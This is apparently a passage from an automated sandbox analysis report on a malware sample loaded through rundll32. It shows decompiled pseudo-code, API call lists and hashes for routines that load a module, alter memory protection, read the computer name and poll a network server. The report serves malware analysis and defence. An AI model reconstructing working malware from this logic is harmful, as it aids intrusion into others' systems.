                				while(1) {
                					_t7 = StrChrA();
                					if(_t7 == 0) {
                						break;
                					}
                					_t20 = _t20 + 1;
                					_push(0x20);
                					_push( &(_t7[1]));
                				}
                				_t11 = E04B96601(_t20 << 2);
                				_a4 = _t11;
                				if(_t11 != 0) {
                					StrTrimA(_t16, 0x4b99278); // executed
                					_t22 = 0;
                					do {
                						_t14 = StrChrA(_t16, 0x20);
                						if(_t14 != 0) {
                							 *_t14 = 0;
                							do {
                								_t14 =  &(_t14[1]);
                								_t18 =  *_t14;
                							} while (_t18 == 0x20 || _t18 == 9);
                						}
                						_t17 = _a4;
                						 *(_t17 + _t22 * 4) = _t16;
                						_t22 = _t22 + 1;
                						_t16 = _t14;
                					} while (_t14 != 0);
                					 *_a8 = _t17;
                				}
                				return 0;
                			}

                APIs
                • StrChrA.SHLWAPI(?,00000020,00000000,051095FC,?,?,04B97883,?,051095FC), ref: 04B9166F
                • StrTrimA.SHLWAPI(?,04B99278,00000002,?,04B97883,?,051095FC), ref: 04B9168D
                • StrChrA.SHLWAPI(?,00000020,?,04B97883,?,051095FC), ref: 04B91698
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Trim
                • String ID:
                • API String ID: 3043112668-0
                • Opcode ID: 90259851d819a404b9a0406ae73306c9002ca1d64d8a969decbf846b5b446548
                • Instruction ID: cce75a48902567899759fd21026f3f8d7a7efaf9675235c707931c015018e4da
                • Opcode Fuzzy Hash: 90259851d819a404b9a0406ae73306c9002ca1d64d8a969decbf846b5b446548
                • Instruction Fuzzy Hash: D2019A71B003566AFB204E2E8C54F637BCDEB8A340F0840B2AA41CB292DA70EC02D660
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773208004.0000000000BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_bb0000_rundll32.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID: X
                • API String ID: 544645111-3081909835
                • Opcode ID: 632701b67340bb54fcd7d48c37394b6c63e9b253b34bd9e06e6797316f39803f
                • Instruction ID: 4cdb6703353aaa9dc21bc4ec037e210fbfc97c1e3b09db3d89f1cf903b0c4f0d
                • Opcode Fuzzy Hash: 632701b67340bb54fcd7d48c37394b6c63e9b253b34bd9e06e6797316f39803f
                • Instruction Fuzzy Hash: 64419DB5E006288FDB24CF18C980B98BBB1FF49310F5581A9C909AB352D371AD81CF91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E04B94130(void* _a4) {
                				char _t2;
                
                				_t2 = RtlFreeHeap( *0x4b9a2d8, 0, _a4); // executed
                				return _t2;
                			}

                APIs
                • RtlFreeHeap.NTDLL(00000000,00000000,04B9658A,00000000,?,00000000,00000000), ref: 04B9413C
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID: Uet
                • API String ID: 3298025750-2766386878
                • Opcode ID: 52b500f5288ff8b0756dafbf509c2ec9a5b3a6fa1adda6fb091a627d6ec16b77
                • Instruction ID: 5a1560fa630398bc4c5f8b40e7c85bc9bc60b3fe2323b0218a86f729394b4ad9
                • Opcode Fuzzy Hash: 52b500f5288ff8b0756dafbf509c2ec9a5b3a6fa1adda6fb091a627d6ec16b77
                • Instruction Fuzzy Hash: 63B012B1200200BBCF214B10DF04F057A21E758700F008016B304010708A360C20FB35
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E04B92DB2(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                				void* _v8;
                				void* __esi;
                				intOrPtr* _t35;
                				void* _t40;
                				intOrPtr* _t41;
                				intOrPtr* _t43;
                				intOrPtr* _t45;
                				intOrPtr* _t50;
                				intOrPtr* _t52;
                				void* _t54;
                				intOrPtr* _t55;
                				intOrPtr* _t57;
                				intOrPtr* _t61;
                				intOrPtr* _t65;
                				intOrPtr _t68;
                				void* _t72;
                				void* _t75;
                				void* _t76;
                
                				_t55 = _a4;
                				_t35 =  *((intOrPtr*)(_t55 + 4));
                				_a4 = 0;
                				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                				if(_t76 < 0) {
                					L18:
                					return _t76;
                				}
                				_t40 = E04B932F6(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                				_t76 = _t40;
                				if(_t76 >= 0) {
                					_t61 = _a28;
                					if(_t61 != 0 &&  *_t61 != 0) {
                						_t52 = _v8;
                						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                					}
                					if(_t76 >= 0) {
                						_t43 =  *_t55;
                						_t68 =  *0x4b9a348; // 0x56d5a8
                						_t20 = _t68 + 0x4b9b1fc; // 0x740053
                						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                						if(_t76 >= 0) {
                							_t76 = E04B971DF(_a4);
                							if(_t76 >= 0) {
                								_t65 = _a28;
                								if(_t65 != 0 &&  *_t65 == 0) {
                									_t50 = _a4;
                									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                								}
                							}
                						}
                						_t45 = _a4;
                						if(_t45 != 0) {
                							 *((intOrPtr*)( *_t45 + 8))(_t45);
                						}
                						_t57 = __imp__#6;
                						if(_a20 != 0) {
                							 *_t57(_a20);
                						}
                						if(_a12 != 0) {
                							 *_t57(_a12);
                						}
                					}
                				}
                				_t41 = _v8;
                				 *((intOrPtr*)( *_t41 + 8))(_t41);
                				goto L18;
                			}

                APIs
                  • Part of subcall function 04B932F6: SysAllocString.OLEAUT32(80000002), ref: 04B93353
                  • Part of subcall function 04B932F6: SysFreeString.OLEAUT32(00000000), ref: 04B933B9
                • SysFreeString.OLEAUT32(?), ref: 04B92E91
                • SysFreeString.OLEAUT32(04B94515), ref: 04B92E9B
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: String$Free$Alloc
                • String ID:
                • API String ID: 986138563-0
                • Opcode ID: 737dc48d5e8d05a986a9a00e4bac3872f22c9eddc2adc6d23e5e715e230d8633
                • Instruction ID: 498afc49f8ee7884d3230f306a26500745be5c389bbaf27c730da9c13714a823
                • Opcode Fuzzy Hash: 737dc48d5e8d05a986a9a00e4bac3872f22c9eddc2adc6d23e5e715e230d8633
                • Instruction Fuzzy Hash: 31315A75900519FFCF15EF54C888C9BBBB9FBC97407148AA8F8159B220E631AD51CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E00401925(void* __eax) {
                				char _v8;
                				void* _v12;
                				void* __edi;
                				void* _t18;
                				long _t26;
                				long _t29;
                				intOrPtr _t40;
                				void* _t41;
                				intOrPtr* _t42;
                				void* _t44;
                
                				_t41 = __eax;
                				_t16 =  *0x4041c0;
                				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x4041c0 - 0x69b24f45 &  !( *0x4041c0 - 0x69b24f45);
                				_t18 = E00401AA8( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x4041c0 - 0x69b24f45 &  !( *0x4041c0 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x4041c0 - 0x69b24f45 &  !( *0x4041c0 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
                				if(_t18 != 0) {
                					_t29 = 8;
                					goto L8;
                				} else {
                					_t40 = _v8;
                					_t29 = E004019C9(_t33, _t40, _t41);
                					if(_t29 == 0) {
                						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                						_t29 = E00401385(_t40, _t44);
                						if(_t29 == 0) {
                							_t26 = E00401152(_t44, _t40); // executed
                							_t29 = _t26;
                							if(_t29 == 0) {
                								_push(_t26);
                								_push(1);
                								_push(_t40);
                								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                									_t29 = GetLastError();
                								}
                							}
                						}
                					}
                					_t42 = _v12;
                					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                					E00401B8C(_t42);
                					L8:
                					return _t29;
                				}
                			}

                APIs
                  • Part of subcall function 00401AA8: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401961,?,?,?,?,?,00000002,?,?), ref: 00401ACC
                  • Part of subcall function 00401AA8: GetProcAddress.KERNEL32(00000000,?), ref: 00401AEE
                  • Part of subcall function 00401AA8: GetProcAddress.KERNEL32(00000000,?), ref: 00401B04
                  • Part of subcall function 00401AA8: GetProcAddress.KERNEL32(00000000,?), ref: 00401B1A
                  • Part of subcall function 00401AA8: GetProcAddress.KERNEL32(00000000,?), ref: 00401B30
                  • Part of subcall function 00401AA8: GetProcAddress.KERNEL32(00000000,?), ref: 00401B46
                  • Part of subcall function 00401385: LoadLibraryA.KERNEL32 ref: 004013BD
                  • Part of subcall function 00401152: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 0040118B
                  • Part of subcall function 00401152: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00401200
                  • Part of subcall function 00401152: GetLastError.KERNEL32 ref: 00401206
                • GetLastError.KERNEL32(?,?), ref: 004019A3
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
                • String ID: @Met`fet MetTet
                • API String ID: 3135819546-3757152079
                • Opcode ID: 1046f364fa201fed147f0656f1e095bc89a0743ce042f68b32fc3e67f1d2f891
                • Instruction ID: 72f375baed0aad7469d874c0145223312decf7d168196047134e353b5cd8a30c
                • Opcode Fuzzy Hash: 1046f364fa201fed147f0656f1e095bc89a0743ce042f68b32fc3e67f1d2f891
                • Instruction Fuzzy Hash: 70110BB6600701ABD721ABA68C90DAB77BCAF88314700453BEA42B7651DA78ED0587D5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00401490() {
                				char _v16;
                				intOrPtr _v28;
                				void _v32;
                				void* _v36;
                				intOrPtr _t15;
                				void* _t16;
                				void* _t24;
                				long _t25;
                				int _t26;
                				void* _t30;
                				intOrPtr* _t32;
                				signed int _t36;
                				intOrPtr _t39;
                
                				_t15 =  *0x4041c4;
                				if( *0x4041ac > 5) {
                					_t16 = _t15 + 0x4050f9;
                				} else {
                					_t16 = _t15 + 0x4050b1;
                				}
                				E00401000(_t16, _t16);
                				_t36 = 6;
                				memset( &_v32, 0, _t36 << 2);
                				_t24 = E004017DC( &_v32,  &_v16,  *0x4041c0 ^ 0xf7a71548); // executed
                				if(_t24 == 0) {
                					_t25 = 0xb;
                				} else {
                					_t26 = lstrlenW( *0x4041b8);
                					_t8 = _t26 + 2; // 0x2
                					_t11 = _t26 + _t8 + 8; // 0xa
                					_t30 = E00402133(_t39, _t11,  &_v32,  &_v36); // executed
                					if(_t30 == 0) {
                						_t40 =  *0x4041b8;
                						_t32 = _v36;
                						 *_t32 = 0;
                						if( *0x4041b8 == 0) {
                							 *((short*)(_t32 + 4)) = 0;
                						} else {
                							E00402205(_t45, _t40, _t32 + 4);
                						}
                					}
                					_t25 = E00401925(_v28); // executed
                				}
                				ExitThread(_t25);
                			}

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: ExitThreadlstrlen
                • String ID:
                • API String ID: 2636182767-0
                • Opcode ID: d02ff361556716031ea6bec9cabf07267ff9448d31515e75f41d89da0bc30c53
                • Instruction ID: d52327a05ec91a1e3f0abcfd8f54c358809bfb752cfc67fb9d79104120d85cf8
                • Opcode Fuzzy Hash: d02ff361556716031ea6bec9cabf07267ff9448d31515e75f41d89da0bc30c53
                • Instruction Fuzzy Hash: D511D072504201ABE711DBA5DD49E9B77ECAB84304F05493BF102FB1F1E738E5448B4A
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 04B94B18
                  • Part of subcall function 04B92DB2: SysFreeString.OLEAUT32(?), ref: 04B92E91
                • SafeArrayDestroy.OLEAUT32(?), ref: 04B94B68
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: ArraySafe$CreateDestroyFreeString
                • String ID:
                • API String ID: 3098518882-0
                • Opcode ID: 9b41dc272dfd2aac07b8736e2d58bdc6a2285d684dcf0f77d62b97c4788cc397
                • Instruction ID: 3a0e3ce5e2ff7906980d81a285c4a41e71f754abe573560326f3024568cb4f38
                • Opcode Fuzzy Hash: 9b41dc272dfd2aac07b8736e2d58bdc6a2285d684dcf0f77d62b97c4788cc397
                • Instruction Fuzzy Hash: 3E113075900209BFDF019FA4D805AEEBBB9EF04750F008066EA04E7160E775AE15DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E04B9405E(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                				void* _t21;
                				void* _t22;
                				signed int _t24;
                				intOrPtr* _t26;
                				void* _t27;
                
                				_t26 = __edi;
                				if(_a4 == 0) {
                					L2:
                					_t27 = E04B92A10(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                					if(_t27 == 0) {
                						_t24 = _a12 >> 1;
                						if(_t24 == 0) {
                							_t27 = 2;
                							HeapFree( *0x4b9a2d8, 0, _a4);
                						} else {
                							_t21 = _a4;
                							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                							 *_t26 = _t21;
                						}
                					}
                					L6:
                					return _t27;
                				}
                				_t22 = E04B94768(_a4, _a8, _a12, __edi); // executed
                				_t27 = _t22;
                				if(_t27 == 0) {
                					goto L6;
                				}
                				goto L2;
                			}

                APIs
                  • Part of subcall function 04B94768: SysFreeString.OLEAUT32(00000000), ref: 04B947CB
                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,746AF710,?,00000000,?,00000000,?,04B9423F,?,004F0053,051093D8,00000000,?), ref: 04B940C1
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Free$HeapString
                • String ID: Uet
                • API String ID: 3806048269-2766386878
                • Opcode ID: 2f388d92d0befcddf3468a94f4955451f3f24407042e781bf0b0ef6fd5f7115d
                • Instruction ID: b4ebef8450554d58d1b9eea4aa81651037d3c2de829d8cd8f7320173cea03876
                • Opcode Fuzzy Hash: 2f388d92d0befcddf3468a94f4955451f3f24407042e781bf0b0ef6fd5f7115d
                • Instruction Fuzzy Hash: 0501283250461ABBCF229F64CC00EAA3BA5EF08750F058569BE059B221D731AD61DB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E04B924C5(void* __ecx) {
                				signed int _v8;
                				void* _t15;
                				void* _t19;
                				void* _t20;
                				void* _t22;
                				intOrPtr* _t23;
                
                				_t23 = __imp__;
                				_t20 = 0;
                				_v8 = _v8 & 0;
                				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                				_t10 = _v8;
                				if(_v8 != 0) {
                					_t20 = E04B96601(_t10 + 1);
                					if(_t20 != 0) {
                						_t15 =  *_t23(3, _t20,  &_v8); // executed
                						if(_t15 != 0) {
                							 *((char*)(_v8 + _t20)) = 0;
                						} else {
                							E04B94130(_t20);
                							_t20 = 0;
                						}
                					}
                				}
                				return _t20;
                			}

                APIs
                • GetComputerNameExA.KERNEL32(00000003,00000000,04B96CDC,00000000,00000000,?,76B5C740,04B96CDC), ref: 04B924DD
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • GetComputerNameExA.KERNEL32(00000003,00000000,04B96CDC,04B96CDD,?,76B5C740,04B96CDC), ref: 04B924FA
                  • Part of subcall function 04B94130: RtlFreeHeap.NTDLL(00000000,00000000,04B9658A,00000000,?,00000000,00000000), ref: 04B9413C
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: ComputerHeapName$AllocateFree
                • String ID:
                • API String ID: 187446995-0
                • Opcode ID: ef6dc7a8254ea954fffa5e589b9b1080e19524d23918ab8361f92b92553673ac
                • Instruction ID: 19d372264d6c1b397dc8a001c9c15863ac12159a39b7c7cb28c755a9c829e281
                • Opcode Fuzzy Hash: ef6dc7a8254ea954fffa5e589b9b1080e19524d23918ab8361f92b92553673ac
                • Instruction Fuzzy Hash: 13F05E76A00119BAEF11D6AA8D20EAF7BECDBC5754F1140FAAD04D3141EA70EE019670
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E04B968E3(signed int __edx, intOrPtr _a4) {
                				void* _t3;
                				void* _t5;
                				void* _t7;
                				void* _t8;
                				void* _t9;
                				signed int _t10;
                
                				_t10 = __edx;
                				_t3 = HeapCreate(0, 0x400000, 0); // executed
                				 *0x4b9a2d8 = _t3;
                				if(_t3 == 0) {
                					_t8 = 8;
                					return _t8;
                				}
                				 *0x4b9a1c8 = GetTickCount();
                				_t5 = E04B9236F(_a4);
                				if(_t5 == 0) {
                					_t5 = E04B96599(_t9, _a4); // executed
                					if(_t5 == 0) {
                						if(E04B955C3(_t9) != 0) {
                							 *0x4b9a300 = 1; // executed
                						}
                						_t7 = E04B9349A(_t10); // executed
                						return _t7;
                					}
                				}
                				return _t5;
                			}

                APIs
                • HeapCreate.KERNEL32(00000000,00400000,00000000,04B92F29,?), ref: 04B968EC
                • GetTickCount.KERNEL32 ref: 04B96900
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: CountCreateHeapTick
                • String ID:
                • API String ID: 2177101570-0
                • Opcode ID: ad7d294f483502e8e04a5b6a68cf3c43080ef4e31bc224841155067a2fe2f9c6
                • Instruction ID: e5f1993cff60bb63a38d0c6f477a30b5d93323c15796d059799d55f680bd31db
                • Opcode Fuzzy Hash: ad7d294f483502e8e04a5b6a68cf3c43080ef4e31bc224841155067a2fe2f9c6
                • Instruction Fuzzy Hash: 60F039B0644301ABEF612F709E15B1937D4EB6C748F1044BAE84196281EB75EC149631
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E04B9469F(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
                				intOrPtr _v12;
                				signed int _v20;
                				intOrPtr _v24;
                				signed int _v60;
                				char _v68;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				intOrPtr _t14;
                				signed int* _t16;
                				signed int _t25;
                				signed int _t26;
                				signed int* _t28;
                				signed int _t30;
                
                				_t28 = __ecx;
                				_t14 =  *0x4b9a368; // 0x5109668
                				_v12 = _t14;
                				_t16 = _a12;
                				_t30 = 8;
                				if(_t16 != 0) {
                					 *_t16 =  *_t16 & 0x00000000;
                				}
                				do {
                					_t31 =  &_v68;
                					if(E04B967A3( &_v68) == 0) {
                						goto L16;
                					}
                					_t30 = E04B963F7(_t31, _a4, _v12);
                					if(_t30 == 0) {
                						_t25 = E04B971C3(_t31, 0x102, _t28, _t30); // executed
                						_t30 = _t25;
                						if(_t30 != 0) {
                							if(_t30 == 0x102) {
                								E04B9A000 = E04B9A000 + 0xea60;
                							}
                						} else {
                							if(_v24 != 0xc8) {
                								_t30 = 0xe8;
                							} else {
                								_t26 = _v20;
                								if(_t26 == 0) {
                									_t30 = 0x10d2;
                								} else {
                									_t28 = _a8;
                									if(_t28 != 0) {
                										_v60 = _v60 & _t30;
                										 *_t28 = _v60;
                										_t28 = _a12;
                										if(_t28 != 0) {
                											 *_t28 = _t26;
                										}
                									}
                								}
                							}
                						}
                					}
                					E04B92062( &_v68, 0x102, _t28, _t30);
                					L16:
                				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x4b9a30c, 0) == 0x102);
                				return _t30;
                			}

                APIs
                • WaitForSingleObject.KERNEL32(00000000,746981D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B94751
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: ObjectSingleWait
                • String ID:
                • API String ID: 24740636-0
                • Opcode ID: 409d1c061cee61321b3b87f9991f9f735ff1fb48cc634c6776598755879ba798
                • Instruction ID: 9a2d029194d67fc9019cf0cb47ca3f053bdd79c0cd78f8c76d9564bc341476a1
                • Opcode Fuzzy Hash: 409d1c061cee61321b3b87f9991f9f735ff1fb48cc634c6776598755879ba798
                • Instruction Fuzzy Hash: 1221C075B082199BDF109E69E880B7E37F1EB86355F1444BAE5019B240EB78FC03CB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 34%
                			E04B94768(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                				intOrPtr _v12;
                				void* _v18;
                				char _v20;
                				intOrPtr _t15;
                				void* _t17;
                				intOrPtr _t19;
                				void* _t23;
                
                				_v20 = 0;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosw");
                				_t15 =  *0x4b9a348; // 0x56d5a8
                				_t4 = _t15 + 0x4b9b3a0; // 0x5108948
                				_t20 = _t4;
                				_t6 = _t15 + 0x4b9b124; // 0x650047
                				_t17 = E04B92DB2(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                				if(_t17 < 0) {
                					_t23 = _t17;
                				} else {
                					_t23 = 8;
                					if(_v20 != _t23) {
                						_t23 = 1;
                					} else {
                						_t19 = E04B960AE(_t20, _v12);
                						if(_t19 != 0) {
                							 *_a16 = _t19;
                							_t23 = 0;
                						}
                						__imp__#6(_v12);
                					}
                				}
                				return _t23;
                			}

                APIs
                  • Part of subcall function 04B92DB2: SysFreeString.OLEAUT32(?), ref: 04B92E91
                  • Part of subcall function 04B960AE: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04B91B9D,004F0053,00000000,?), ref: 04B960B7
                  • Part of subcall function 04B960AE: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04B91B9D,004F0053,00000000,?), ref: 04B960E1
                  • Part of subcall function 04B960AE: memset.NTDLL ref: 04B960F5
                • SysFreeString.OLEAUT32(00000000), ref: 04B947CB
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: FreeString$lstrlenmemcpymemset
                • String ID:
                • API String ID: 397948122-0
                • Opcode ID: 584afff6c8c71eb061a6b2683be3bc06674be4480e1660905e48e1a6d4b59cd7
                • Instruction ID: 50d112e4d7763e3a18c08d3b74abf610be69098f4aa32df3f6d6605a77197fcd
                • Opcode Fuzzy Hash: 584afff6c8c71eb061a6b2683be3bc06674be4480e1660905e48e1a6d4b59cd7
                • Instruction Fuzzy Hash: 69015A3250811DBFDF119FA8DC44AAABBF8FB09650F0245B5E901E7160E770BD26D7A0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E00401000(void* __eax, intOrPtr _a4) {
                
                				 *0x4041d0 =  *0x4041d0 & 0x00000000; // zeroed before the call
                				_push(0);          // SecurityDescriptorSize: NULL, size not requested
                				_push(0x4041cc);   // out PSECURITY_DESCRIPTOR, stored in the global at 0x4041cc
